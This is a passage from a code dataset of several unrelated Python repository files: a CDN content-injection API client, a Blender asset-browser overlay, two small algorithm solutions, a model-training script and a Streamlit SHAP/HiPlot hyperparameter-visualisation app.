'http://{ip}:{port}/{interface_i}'\n\n\nclass RequestCDN(object):\n \"\"\"\n 数码cdn接口,用于访问cdn接口\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def transfer_content(in_xml_bytes):\n \"\"\"\n 此接口为点播内容注入接口,由CMS向CDN发起,CDN通过该接口,把媒体文件从AMS处下载到本地,并生成m3u8文件。\n :param in_xml_bytes: \n :return: \n \"\"\"\n p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n interface_i='TransferContent')\n try:\n ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n except:\n r_log.error(traceback.format_exc())\n return None\n return ret_value.status_code\n\n @staticmethod\n def get_transfer_status(in_xml_bytes):\n \"\"\"\n 此接口为点播内容注入查询接口,由CMS向CDN发起,通过该接口,CMS可以查询注入任务的状态和进度\n :param in_xml_bytes: \n :return: \n \"\"\"\n p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n interface_i='GetTransferStatus')\n try:\n ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n except:\n r_log.error(traceback.format_exc())\n return None, None\n if ret_value.status_code == 200:\n return ret_value.status_code, ret_value.text\n else:\n return ret_value.status_code, None\n\n @staticmethod\n def cancel_transfer(in_xml_bytes):\n \"\"\"\n 此接口为点播内容注入取消接口,由CMS向CDN发起,通过该接口,\n CMS可以取消正在注入的内容,对于已经注入成功的内容,将按删除命令处理\n :param in_xml_bytes: \n :return: \n \"\"\"\n p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n interface_i='CancelTransfer')\n try:\n ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n except:\n r_log.error(traceback.format_exc())\n return None\n return ret_value.status_code\n\n @staticmethod\n def delete_content(in_xml_bytes):\n \"\"\"\n 此接口为点播内容删除接口,由CMS向CDN发起,通过该接口,CMS可以删除已经注入的内容,对于正在注入的内容,按取消接口处理\n :param in_xml_bytes: \n :return: \n \"\"\"\n p_url = CDN_URL.format(ip=pj_dict['cdn_addr']['ip'], port=pj_dict['cdn_addr']['port'],\n interface_i='DeleteContent')\n try:\n ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n except:\n r_log.error(traceback.format_exc())\n return None\n return ret_value.status_code\n\n\ndef test_server_post(in_xml_bytes):\n p_url = CDN_URL.format(ip='10.255.46.104', port=15001,\n interface_i='TransferStatus')\n try:\n ret_value = requests.post(p_url, headers=q_headers, data=in_xml_bytes)\n except:\n r_log.error(traceback.format_exc())\n return None\n return ret_value.status_code\n\n\nif __name__ == '__main__':\n test_xml_str = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<TransferStatus providerID=\"meixun\" assetID=\"Z67610c5f861d427af80\" volumeName=\"volumeA\"><Output subID=\"2800013\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"1000012\" maxBitRate=\"1002173\" duration=\"1800\" contentSize=\"225028104\" supportFileSize=\"107728993\" md5Checksum=\"2d1ae877f2c8cd07582b7217ba0918dd\"/><Output subID=\"4480022\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"1000012\" maxBitRate=\"1002173\" duration=\"1800\" contentSize=\"225028104\" supportFileSize=\"107728993\" md5Checksum=\"2d1ae877f2c8cd07582b7217ba0918dd\"/><Output subID=\"7500220\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"1000012\" maxBitRate=\"1002173\" duration=\"1800\" contentSize=\"225028104\" supportFileSize=\"107728993\" md5Checksum=\"2d1ae877f2c8cd07582b7217ba0918dd\"/></TransferStatus>\"\"\"\n trans_st_str = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?><TransferStatus providerID=\"meixun\" assetID=\"3a8bbce52f63b2b7936c\" volumeName=\"volumeA\"><Output subID=\"2800012\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"2800003\" maxBitRate=\"2802772\" duration=\"8859\" contentSize=\"3100696408\" supportFileSize=\"1455188926\" md5Checksum=\"443ff8fb652f74bc03e628ee3e6e08cb\"/><Output subID=\"4480019\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\" avgBitRate=\"4480010\" maxBitRate=\"4484982\" duration=\"8859\" contentSize=\"4961111320\" supportFileSize=\"2312247430\" md5Checksum=\"a339212f44f9647b8abfcf312f470c84\"/><Output subID=\"7500033\" state=\"Complete\" percentComplete=\"100\" reasonCode=\"200\"/></TransferStatus>\"\"\"\n test_xml_str1 = test_xml_str.replace('amp;', '')\n test_xml_bytes = test_xml_str1.encode(encoding='utf-8')\n if int(sys.argv[1]) == 1: # 注入\n s_code = RequestCDN.transfer_content(test_xml_bytes)\n if s_code == 200:\n print('insert good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 2: # 状态查询\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'), 'GetTransferStatus', 0)\n s_code, re_xml = RequestCDN.get_transfer_status(status_bytes)\n if s_code == 200:\n print(re_xml)\n else:\n print('query failed')\n elif int(sys.argv[1]) == 3:\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'), 'CancelTransfer', 404)\n s_code = RequestCDN.cancel_transfer(status_bytes)\n if s_code == 200:\n print('cancel good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 4:\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'), 'DeleteContent', 201)\n s_code = RequestCDN.delete_content(status_bytes)\n if s_code == 200:\n print('delete good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 5:\n s_code = test_server_post(trans_st_str)\n if s_code == 200:\n print('post good')\n else:\n print('failed, {}'.format(s_code))\n elif int(sys.argv[1]) == 6:\n start_time = time.time()\n status_bytes = xml_parser.XmlParser.get_query_str(test_xml_str.encode(encoding='utf-8'),\n 'GetTransferStatus', 0)\n for i in range(0, 1000):\n s_code, re_xml = RequestCDN.get_transfer_status(status_bytes)\n if s_code == 200:\n print(re_xml)\n else:\n print('query failed')\n end_time = time.time()\n print('used time is <{}>'.format(end_time - start_time))\n","repo_name":"Achillesxu/cds_auto_import","sub_path":"CDS_Auto_Import_tools/request_shuma_cdn.py","file_name":"request_shuma_cdn.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8987947690","text":"import math\nimport time\n\nimport bpy\nimport blf\nimport bgl\nimport gpu\n\nfrom gpu_extras.batch import batch_for_shader\nfrom mathutils import Vector\n\nfrom .utils import asset_match_filter\nfrom .thumbnails import get_thumbnail\n\n#\n# Drawing utils.\n#\n\nimage_2d_fragment_shader = \"\"\"\n in vec2 texCoord_interp;\n out vec4 fragColor;\n uniform sampler2D image;\n\n void main()\n {\n fragColor = pow(texture(image, texCoord_interp), vec4(2.2));\n }\n\n\"\"\"\n\nUNIFORM_SHADER_2D = gpu.shader.from_builtin(\"2D_UNIFORM_COLOR\")\nIMAGE_SHADER_2D = gpu.types.GPUShader(\n gpu.shader.code_from_builtin(\"2D_IMAGE\")[\"vertex_shader\"], image_2d_fragment_shader\n)\n\n\ndef draw_square(position, width, height, color):\n vertices = (\n (position.x, position.y),\n (position.x + width, position.y),\n (position.x, position.y + height),\n (position.x + width, position.y + height),\n )\n indices = ((0, 1, 2), (2, 1, 3))\n\n batch = batch_for_shader(UNIFORM_SHADER_2D, \"TRIS\", {\"pos\": vertices}, indices=indices)\n\n UNIFORM_SHADER_2D.bind()\n UNIFORM_SHADER_2D.uniform_float(\"color\", color)\n batch.draw(UNIFORM_SHADER_2D)\n\n\ndef draw_image(position, width, height, textureid):\n vertices = (\n (position.x, position.y),\n (position.x + width, position.y),\n (position.x, position.y + height),\n (position.x + width, position.y + height),\n )\n indices = ((0, 1, 2), (2, 1, 3))\n\n batch = batch_for_shader(\n IMAGE_SHADER_2D, \"TRIS\", {\"pos\": vertices, \"texCoord\": ((0, 0), (1, 0), (0, 1), (1, 1))}, indices=indices,\n )\n\n bgl.glActiveTexture(bgl.GL_TEXTURE0)\n bgl.glBindTexture(bgl.GL_TEXTURE_2D, textureid)\n IMAGE_SHADER_2D.bind()\n IMAGE_SHADER_2D.uniform_int(\"image\", 0)\n batch.draw(IMAGE_SHADER_2D)\n\n\nclass GlTexture:\n def __init__(self, image_preview):\n width, height = image_preview.image_size\n self._texture_id = bgl.Buffer(bgl.GL_INT, 1)\n self.pixel_buffer = bgl.Buffer(bgl.GL_FLOAT, width * height * 4, list(image_preview.image_pixels_float))\n\n bgl.glGenTextures(1, self._texture_id)\n bgl.glBindTexture(bgl.GL_TEXTURE_2D, self._texture_id[0])\n bgl.glTexImage2D(\n bgl.GL_TEXTURE_2D, 0, bgl.GL_RGB, width, height, 0, bgl.GL_RGBA, bgl.GL_FLOAT, self.pixel_buffer,\n )\n\n bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MIN_FILTER, bgl.GL_LINEAR)\n bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MAG_FILTER, bgl.GL_LINEAR)\n\n def __del__(self):\n bgl.glDeleteTextures(1, self._texture_id)\n\n @property\n def texture_id(self):\n return self._texture_id[0]\n\n\n#\n# Misc\n#\ndef get_region_at_xy(context, x, y):\n \"\"\"\n Does not support quadview right now\n\n :param context:\n :param x:\n :param y:\n :return: the region and the area containing this region\n \"\"\"\n for area in context.screen.areas:\n if area.type != \"VIEW_3D\":\n continue\n # is_quadview = len ( area.spaces.active.region_quadviews ) == 0\n i = -1\n for region in area.regions:\n if region.type == \"WINDOW\":\n i += 1\n if region.x <= x < region.width + region.x and region.y <= y < region.height + region.y:\n\n return region, area\n\n return None, None\n\n\nclass BlWidget:\n def __init__(self, context, parent=None):\n self._context = context\n self._parent = parent\n self._position = Vector((0, 0)) # Relative Position from parent\n self._height = 0.0\n self._width = 0.0\n\n @property\n def context(self):\n return self._context\n\n @property\n def parent(self) -> \"BlWidget\":\n return self._parent\n\n @property\n def absolute_position(self):\n parent_pos = Vector((0, 0)) if self._parent is None else self.parent.absolute_position\n return parent_pos + self.position\n\n @property\n def position(self) -> Vector:\n return self._position\n\n @position.setter\n def position(self, value: Vector):\n self._position = value\n\n @property\n def width(self):\n return self._width\n\n @width.setter\n def width(self, value):\n self._width = value\n\n @property\n def height(self):\n return self._height\n\n @height.setter\n def height(self, value):\n self._height = value\n\n @property\n def bbox(self):\n return (\n Vector([self.position.x, self.position.y]),\n Vector([self.position.x + self.width, self.position.y + self.height]),\n )\n\n @property\n def absolute_bbox(self):\n my_low, my_high = self.bbox\n if self.parent is not None:\n my_low += self.parent.absolute_position\n my_high += self.parent.absolute_position\n\n return my_low, my_high\n\n def is_inside(self, x, y):\n low, high = self.absolute_bbox\n if low.x <= x < high.x and low.y <= y < high.y:\n return True\n\n return False\n\n def handle_event(self, event) -> bool:\n \"\"\"\n Return True if you want the event to be processed by other widgets.\n :param event:\n :return:\n \"\"\"\n return False\n\n def draw(self):\n pass\n\n\nclass AssetThumbnail(BlWidget):\n def __init__(self, index, asset, context, parent=None):\n BlWidget.__init__(self, context, parent)\n self.asset = asset\n self.texture = GlTexture(get_thumbnail(self.asset))\n self.show_tooltip = False\n self._prev_click = 0\n self.index = index\n\n def handle_event(self, event) -> bool:\n props = self.context.window_manager.uas_asset_bank\n self.show_tooltip = False\n region, _area = get_region_at_xy(self.context, event.mouse_x, event.mouse_y)\n mouse_x = event.mouse_x - region.x\n mouse_y = event.mouse_y - region.y\n\n if self.is_inside(mouse_x, mouse_y):\n self.show_tooltip = True\n if event.type == \"LEFTMOUSE\" and event.value == \"PRESS\":\n counter = time.perf_counter()\n props.selected_index = self.index\n if counter - self._prev_click < 0.2:\n bpy.ops.uas.asset_bank_import(\n append=False, location=self.context.scene.cursor.location, index=self.index,\n )\n self._prev_click = counter\n return True\n\n return False\n\n def draw(self):\n draw_image(self.position, self.width, self.height, self.texture.texture_id)\n if self.show_tooltip:\n p = self.absolute_position\n vertices = (\n (p.x, p.y),\n (p.x + self.width, p.y + 20),\n (p.x, p.y + 20),\n (p.x + self.width, p.y),\n )\n indices = ((0, 1, 2), (0, 1, 3))\n\n batch = batch_for_shader(UNIFORM_SHADER_2D, \"TRIS\", {\"pos\": vertices}, indices=indices)\n\n UNIFORM_SHADER_2D.bind()\n UNIFORM_SHADER_2D.uniform_float(\"color\", [0, 0, 0, 1])\n batch.draw(UNIFORM_SHADER_2D)\n\n blf.color(0, 0.99, 0.99, 0.99, 1)\n blf.size(0, 11, 72)\n text_width, text_height = blf.dimensions(0, self.asset.data_name)\n posx = (self.width - text_width) * 0.5 + self.absolute_position.x\n blf.position(0, posx, 8, 0)\n blf.draw(0, self.asset.data_name)\n\n\nclass AssetBrowser(BlWidget):\n def __init__(self, context, parent=None):\n BlWidget.__init__(self, context, parent)\n self.item_per_page = 10\n self.current_page = 0\n self.max_page = self.current_page\n self.asset_thumbnails = list()\n\n self.paddingx = 2\n self.height = 150\n self.width = self.item_per_page * (self.height + self.paddingx) + self.paddingx\n self.filter_name = self.context.window_manager.uas_asset_bank.filter_name\n\n self.load_page()\n\n def load_page(self):\n self.asset_thumbnails = list()\n props = self.context.window_manager.uas_asset_bank\n assets = [(i, a) for i, a in enumerate(props.assets)]\n assets.sort(key=lambda a: a[1].data_name.lower())\n if props.filter_name != \"\":\n assets = [a for a in assets if asset_match_filter(a[1], props.filter_name.strip().lower().split(), 1)]\n\n self.max_page = math.floor(len(assets) / self.item_per_page)\n self.current_page = max(0, self.current_page)\n self.current_page = min(self.max_page, self.current_page)\n start = min(self.current_page * self.item_per_page, len(assets))\n end = min(start + self.item_per_page, len(assets))\n\n assets_to_show = assets[start:end]\n posx = self.paddingx\n for index, asset in assets_to_show:\n at = AssetThumbnail(index, asset, self.context, self)\n at.width = self.height\n at.height = self.height - 4\n at.position.x = posx\n at.position.y = 2\n posx += self.height + 2\n self.asset_thumbnails.append(at)\n\n self.width = len(assets_to_show) * (self.height + self.paddingx) + self.paddingx\n\n def handle_event(self, event) -> bool:\n props = self.context.window_manager.uas_asset_bank\n if self.filter_name != props.filter_name:\n self.filter_name = props.filter_name\n self.current_page = 0\n self.load_page()\n\n region, _area = get_region_at_xy(self.context, event.mouse_x, event.mouse_y)\n mouse_x = event.mouse_x - region.x\n mouse_y = event.mouse_y - region.y\n if self.is_inside(mouse_x, mouse_y):\n if event.type == \"WHEELUPMOUSE\":\n self.current_page -= 1\n self.load_page()\n return True\n elif event.type == \"WHEELDOWNMOUSE\":\n self.current_page += 1\n self.load_page()\n return True\n\n for at in self.asset_thumbnails:\n if at.handle_event(event):\n return True\n\n return False\n\n def draw(self):\n self.height = 150\n draw_square(self.position, self.width, self.height, [0.2, 0.2, 0.2, 0.75])\n for at in self.asset_thumbnails:\n at.draw()\n\n blf.color(0, 0.99, 0.99, 0.99, 1)\n blf.size(0, 11, 72)\n blf.position(0, self.position.x + self.width * 0.5, self.position.y + self.height + 2, 0)\n blf.draw(0, f\"{self.current_page + 1}/{self.max_page + 1}\")\n\n\nclass UAS_AssetBank_ViewportBrowser(bpy.types.Operator):\n bl_idname = \"uas.asset_bank_viewport_browser\"\n bl_label = \"Viewport Browser\"\n\n def __init__(self):\n self.asset_browser = None\n\n self.draw_handle = None\n self.draw_event = None\n\n def modal(self, context, event):\n region, area = get_region_at_xy(context, event.mouse_x, event.mouse_y)\n\n if region is None:\n return {\"PASS_THROUGH\"}\n area.tag_redraw()\n\n if self.asset_browser.handle_event(event):\n return {\"RUNNING_MODAL\"}\n\n if context.window_manager.uas_asset_bank.toggle_overlay is False:\n context.window_manager.event_timer_remove(self.draw_event)\n bpy.types.SpaceView3D.draw_handler_remove(self.draw_handle, \"WINDOW\")\n return {\"CANCELLED\"}\n\n return {\"PASS_THROUGH\"}\n\n def invoke(self, context, event):\n self.asset_browser = AssetBrowser(context)\n self.draw_handle = bpy.types.SpaceView3D.draw_handler_add(self.draw, (context,), \"WINDOW\", \"POST_PIXEL\")\n self.draw_event = context.window_manager.event_timer_add(0.1, window=context.window)\n context.window_manager.modal_handler_add(self)\n return {\"RUNNING_MODAL\"}\n\n def draw(self, context):\n self.asset_browser.draw()\n\n\n_classes = (UAS_AssetBank_ViewportBrowser,)\n\n\ndef register():\n for cls in _classes:\n bpy.utils.register_class(cls)\n\n\ndef unregister():\n for cls in reversed(_classes):\n bpy.utils.unregister_class(cls)\n","repo_name":"ubisoft/assetbank","sub_path":"uas_assetbank/ogl_browser.py","file_name":"ogl_browser.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"6232239063","text":"\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param head: The first node of linked list.\n @param n: An integer.\n @return: Nth to last node of a singly linked list.\n \"\"\"\n\n def nthToLast(self, head, n):\n # write your code here\n p1 = head\n for i in range(0, n):\n p1 = p1.next\n\n p2 = head\n\n while p1 is not None:\n p1 = p1.next\n p2 = p2.next\n\n return p2\n","repo_name":"duoertai/LintCodePython","sub_path":"NthtoLastNodeinList/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2064745867","text":"\n\n\n\n\n'''(Sliding Window using Two Pointers [E]): Given an array of positive integers, \nfind the contiguous subarray that sums to a given number X.\nFor example, input = [1,2,3,5,2] and X=8, Result = [3,5]'''\n\ndef findSubSum(arr, x):\n \n start, end = 0, 0\n windowSum = arr[0]\n\n while start <= len(arr) - 1:\n # start inched forward, bring end back to start\n if start > end:\n end = start\n windowSum = arr[start]\n \n # expand to the right\n if windowSum < x:\n if end == len(arr) - 1:\n # reached end, cannot expand further\n break \n\n end += 1\n windowSum += arr[end]\n \n # contract from left\n elif windowSum > x:\n windowSum -= arr[start]\n start += 1\n else:\n return arr[start:end + 1]\n \n\nprint(findSubSum([1,2,3,5,2], 8))\n\n\n# Output: [2,5]\n# Time: O(n) Space: O(1)\n\n\n\n\n\n","repo_name":"mkoryor/Python","sub_path":"subarrays/findSubSum.py","file_name":"findSubSum.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33137013811","text":"import os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__),'..'))\n\nfrom os.path import isfile\nimport numpy as np\nimport torch\n\nfrom .sensation import Sensation\nfrom .sensation_models import AutoEncoder\nfrom .config import config\n\nfrom TrainBase import TrainBase\nimport sentencepiece as spm\n\nclass Train(TrainBase):\n MemoryFormat = Sensation.MemoryFormat\n LogTitle:str = f'train{MemoryFormat}'\n\n def TrainProcess(self) -> None:\n # ------ Separator training ------\n spm.SentencePieceTrainer.Train(f\"--input={Sensation.Corpus_file} --model_prefix=Sensation{Sensation.MemoryFormat}/params/{config.separator_name} --vocab_size={config.vocab_size}\")\n # --- end of SentencePiece Trainings ---\n self.release_system_memory()\n\n # ------ Fasttext training ------\n separator = spm.SentencePieceProcessor()\n separator.Load(f'Sensation{Sensation.MemoryFormat}/params/{config.separator_name}.model')\n bos = separator.IdToPiece(separator.bos_id())\n eos = separator.IdToPiece(separator.eos_id())\n\n with open(Sensation.Corpus_file,'r',encoding='utf-8') as f:\n corpus = f.read().split('\\n')[-Sensation.CorpusUseLength:]\n words = [[bos,*separator.EncodeAsPieces(i),eos] for i in corpus]\n FTmodel = self.load_python_obj(Sensation.FastText_params)\n FTmodel.build_vocab(words,update=True)\n FTmodel.train(sentences=words,total_examples=len(words),epochs=Sensation.FasttextEpochs)\n self.save_python_obj(Sensation.FastText_params,FTmodel)\n self.log('trained Fasttext')\n # --- end of Fasttext training ---\n\n # ------ AutoEncoder training ------\n data = []\n for i in words:\n vector = torch.from_numpy(np.stack([FTmodel.wv[q] for q in i if q in FTmodel.wv])).type(Sensation.Training_dtype)\n length = vector.size(0)\n for idx in range(0,length,config.text_seq_len):\n d = vector[idx:idx+config.text_seq_len]\n if d.size(0) < config.text_seq_len:\n pad = torch.zeros((config.text_seq_len - d.size(0)),d.size(1),dtype=d.dtype,device=d.device)\n d = torch.cat([d,pad])\n data.append(d)\n data = torch.stack(data)\n idx = np.random.permutation(len(data))[:Sensation.AutoEncoderDataSize]\n data = data[idx]\n\n self.log('Text AutoEncoder data shape',data.shape)\n del FTmodel,separator\n self.release_system_memory()\n model = AutoEncoder()\n model.encoder.load_state_dict(torch.load(Sensation.Encoder_params,map_location=self.device))\n model.decoder.load_state_dict(torch.load(Sensation.Decoder_params,map_location=self.device))\n\n # AutoEncoder settings\n criterion = torch.nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(),lr=Sensation.AutoEncoderLearningRate)\n epochs = Sensation.AutoEncoderEpochs\n batch_size = Sensation.AutoEncoderBatchSize\n # Train\n self.Train(\n model=model,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n criterion=criterion,\n device=self.device,\n train_x=data,\n train_y=data\n ) \n torch.save(model.encoder.state_dict(),Sensation.Encoder_params)\n torch.save(model.decoder.state_dict(),Sensation.Decoder_params)\n self.log('trained AutoEncoder')\n del data,model\n self.release_system_memory()\n # --- end of AutoEncoder training ---\n # ----- corpus reducing ------\n with open(Sensation.Corpus_file,'r',encoding='utf-8') as f:\n corpus = f.readlines()[-Sensation.SavingCorpusLength:]\n with open(Sensation.Corpus_file,'w',encoding='utf-8') as f:\n f.writelines(corpus)\n self.log('reduced corpus')\n self.log('Train process was finished')","repo_name":"Geson-anko/JARVIS3","sub_path":"Sensation7/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"14804962460","text":"from collections import defaultdict\nimport os\n\nimport hiplot as hp\nimport pandas as pd\nimport streamlit as st\n\nimport data_management as dm\n\nimport shap\nimport xgboost\n\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nimport numpy as np\n\nimport re\n\nshap.plots._labels.labels['VALUE'] = 'Influence on the optimized column'\n\nst.set_page_config(page_title='HyperViz', layout='wide')\n\n# custom css to make labels more readable\nst.write('''<style>\nlabel {\n font-size: 1rem !important;\n}\ninput[type=\"radio\"] + div {\n font-size: 0.9rem !important;\n}\n</style>''', unsafe_allow_html=True)\n\n@st.cache(allow_output_mutation=True, ttl=3600)\ndef get_cached_experiment(df: pd.DataFrame):\n exp = hp.Experiment.from_dataframe(df)\n exp._compress = True\n exp.colorby = df.columns[0]\n return exp.to_streamlit(key='hiplot')\n\n@st.cache(allow_output_mutation=True, ttl=3600)\ndef calc_shap_summary_plot(df: pd.DataFrame, column_to_optimize, param_columns, cmap):\n\n df = df[[column_to_optimize]+param_columns]\n encoder = {col: {(val if val == val else 'nan'): encoded for encoded, val in enumerate(pd.unique(df[col]))} for col in param_columns}\n\n for col in param_columns:\n df[col] = df[col].map(lambda x: (encoder[col][x] if x == x else encoder[col]['nan']))\n\n X, y = df.loc[:,df.columns != column_to_optimize], df[column_to_optimize]\n model = xgboost.train({\"learning_rate\": 0.1}, xgboost.DMatrix(X, label=y), 100)\n explainer = shap.TreeExplainer(model)\n shap_values = explainer.shap_values(X)\n\n order = (-np.mean(np.abs(shap_values), axis=0)).argsort()\n ordered_encoder = {}\n for i in order:\n col = param_columns[i]\n ordered_encoder[col] = encoder[col]\n\n fig = plt.figure()\n\n shap.summary_plot(shap_values, X, cmap=cmap, show=False)\n\n return fig, ordered_encoder\n\n@st.cache(allow_output_mutation=True, ttl=3600)\ndef create_legend(encoder, cmap):\n\n legend = {}\n for col, row in encoder.items():\n for val, encoded in row.items():\n if isinstance(val, float) and val.is_integer():\n val = int(val)\n legend.setdefault(encoded, {})[col] = val\n\n def color_table(row):\n val_count = row.size -row.isna().sum()\n if val_count == 1:\n fractions = [0]\n else:\n fractions = [i/(val_count-1) for i in range(val_count)]\n background_colors = cmap(fractions)\n def get_foreground_color(color):\n if (color[0]*0.299 + color[1]*0.587 + color[2]*0.114) > 0.5:\n return '#000000' \n else:\n return '#ffffff'\n\n css = [f'background-color: {matplotlib.colors.rgb2hex(background_colors[i])}; color: {get_foreground_color(background_colors[i])}' if val == val else 'color: #ffffff' for i, val in enumerate(row)]\n return pd.Series(css)\n\n return pd.DataFrame.from_dict(legend).style.apply(color_table, axis=1)\n\ndef shap_viz(df: pd.DataFrame):\n with st.expander('How does this work?'):\n st.write('Your data is used to train a simple __xgboost-model__, with the \"column to optimize\" as label. This model is trying to __predict the performance__ of your model, based on the parameters. After the training is complete, the __SHAP values__ are calculated, which are used to explain the behaviour of this xgboost model. So, as a result, the SHAP values can be used to __explain the influence of a parameter__ on the performance.')\n \n st.write('#')\n column_to_optimize = st.selectbox('Please select the column to optimze:', df.columns)\n other_colums = [col for col in df.columns if col != column_to_optimize]\n\n param_columns = st.multiselect('Which columns are the parameters to be analyzed?', other_colums, [col for col in other_colums if col.startswith('param_')])\n\n draw = st.checkbox('Auto-refresh the plot?')\n if not draw:\n draw = st.button('Draw plot')\n if draw:\n with st.expander('What can I see here?'):\n st.write(\"For each column you chose above you can see a lot of dots; __one dot for each row__ in your dataset. The __color shows the value__ the dot represents and it's __left-right-position shows the impact__ it has on the selected \\\"column to optimize\\\". Underneath is legend to explain, which color stands for which value.\")\n st.write(\"__Example:__ If a parameter only contains two options, you might see a distinct cluster of gray dots and a distinct cluster of black dots. If the gray cluster is further left than the black one, that means that all runs with the \\\"gray\\\" value performed worse than the others. Which value that is, can be read from the legend below the plot.\")\n cmap = matplotlib.cm.get_cmap('nipy_spectral')\n shap.plots._labels.labels['VALUE'] = '[SHAP summary plot] Influence on the selected column'\n fig, encoder = calc_shap_summary_plot(df, column_to_optimize, param_columns, cmap)\n st.write(fig)\n legend = create_legend(encoder, cmap)\n st.write(legend)\n\ndef sidebar():\n st.sidebar.write('# Select and filter you\\'re data here:')\n models = dm.get_models()\n project = st.sidebar.selectbox('Select your project', list(models.keys()))\n if project:\n models = st.sidebar.multiselect('Select the models to compare:', models[project])\n\n if not models:\n return \n\n data = dm.read_files(project, models)\n\n # Filters\n\n st.sidebar.write('### Here you can apply some basic filters before the data is passed to the vizes on the right.')\n st.sidebar.write('#### This can help if your data is to big to be displayed by the Hiplot component.')\n st.sidebar.write('####')\n\n if st.sidebar.checkbox('Remove columns with only one unique value?'):\n for col in data.columns:\n if len(data[col].unique()) == 1:\n data.drop(col,inplace=True,axis=1)\n\n col_list = list(data.columns)\n columns_to_keep = st.sidebar.multiselect('Which columns should be displayed?', col_list, col_list)\n data = data[columns_to_keep]\n\n return data\n\ndef center_uploader():\n st.write('## Upload your files here:')\n models = dm.get_models()\n project = st.selectbox('Please select a project:', ['New project']+list(models.keys()))\n project_valid = True\n if project == 'New project':\n project = st.text_input('Please enter a name for the project:')\n project_valid = not re.search(r'[^A-Za-z0-9_\\-]',project)\n if not project_valid:\n st.warning('Project names may only contain alphanumeric characters, _ and -')\n model = st.text_input('Please name the model:')\n else:\n model = st.selectbox('Please select the model:', ['New model']+models[project])\n if model == 'New model':\n model = st.text_input('Please name the model:')\n \n model_valid = not re.search(r'[^A-Za-z0-9_\\-]',model)\n if not model_valid:\n st.warning('Model names may only contain alphanumeric characters, _ and -')\n\n files = st.file_uploader('Upload your .csv file(s) here. You can upload multiple files, of e.g. different GridSearch runs', accept_multiple_files=True)\n\n tag = st.text_input('Provide a tag for the uploaded data. This might be a date, a number or any other string:','default')\n\n delimiter = [';', ','][st.radio('Select the delimiter of the csv file(s):', [0, 1], format_func=lambda x: ['; - Semicolon - GridSearchCV default', ', - Comma - normal CSV'][x])]\n decimal = ['.', ','][st.radio('Select the decimal point of the csv file(s):', [0, 1], format_func=lambda x: ['. - Dot - English', ', - Comma - German'][x])]\n\n df = dm.read_files_to_df(files, delimiter, decimal)\n\n mean_cols = []\n std_cols = []\n param_cols = []\n\n for col in df.columns:\n if col.startswith('mean_test_'):\n mean_cols.append(col)\n elif col.startswith('std_test_'):\n std_cols.append(col)\n elif col.startswith('param_'):\n param_cols.append(col)\n \n columns_suggestion = sorted(mean_cols)+sorted(std_cols)+sorted(param_cols)\n if len(columns_suggestion) == 0:\n columns_suggestion = list(df.columns)\n\n columns_to_keep = st.multiselect('Select which columns you want to keep:', list(df.columns), columns_suggestion)\n\n if st.button('Upload'):\n if not model_valid or not project_valid:\n st.warning('Please fix above warnings!')\n elif len(model) < 1 or len(project) < 1:\n st.warning('Both, project name and model name must not be empty!')\n elif len(files) < 1:\n st.warning(\"You haven't uploaded any file!\")\n elif len(tag) < 1:\n st.warning('The tag may not be empty!')\n else:\n with st.spinner('Processing...'):\n dm.process_data(df, project, model, tag, columns_to_keep)\n st.write('<meta http-equiv=\"refresh\" content=\"0\">', unsafe_allow_html=True)\n\ndef center_delete():\n st.write('## Delete data')\n st.warning(f'This action is __irreversible__! Proceed with caution.')\n models = dm.get_models()\n project = st.selectbox('Select the project:', list(models.keys()))\n if st.button('Delete entire project'):\n if not project:\n st.warning('No project selected')\n else:\n dm.delete_project(project)\n st.write('<meta http-equiv=\"refresh\" content=\"0\">', unsafe_allow_html=True)\n if project:\n models_to_delete = st.multiselect('Select the model(s) to delete:', models[project] if project in models else [])\n if st.button('Delete selected models'):\n if 